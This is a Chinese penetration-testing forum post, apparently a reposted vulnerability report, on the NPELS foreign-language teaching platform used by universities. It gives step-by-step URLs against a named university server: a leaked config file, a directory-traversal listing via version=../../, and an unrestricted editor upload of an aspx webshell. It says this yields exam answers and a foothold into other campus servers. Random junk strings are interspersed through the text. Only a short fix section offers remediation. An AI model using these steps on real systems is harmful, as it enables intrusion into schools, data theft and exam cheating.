中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
  ?3 `7 i6 D. a) J" d( [
' F2 n  u$ z+ d) L1 X3 Y/ T详细说明：
" m; r9 u' G3 t6 @5 i" G! l: p2 W
5 Q, J7 S! n$ Q( g  ^以南开大学的为例:
+ v  E2 i5 A; k, hhttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
; S. v5 i/ Z- P' \</setting>
及版本号
* e! S( L' {  f# r( ]<add key="TVersion" value="1, 0, 0, 2187">
6 h& P0 M& n3 x</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
! l# ^4 a. k5 o* n, C% V! b使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
. k. Q8 g  x' x5 [
; M3 m2 @) b; e0 v$ e发现
+ h& V) U5 B. Thttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
; i# s: O( q, U% o$ \0 g3 t
OOXX
. {; S4 \7 o/ e1 x0 o
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
8 j  U% R9 W; W( |0 Y漏洞证明：

% j6 P* j# u5 ^9 U9 o列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
0 j$ G. W7 G) b6 r9 B% w" b+ G并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
6 N' |0 j" d& [8 `3 |

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2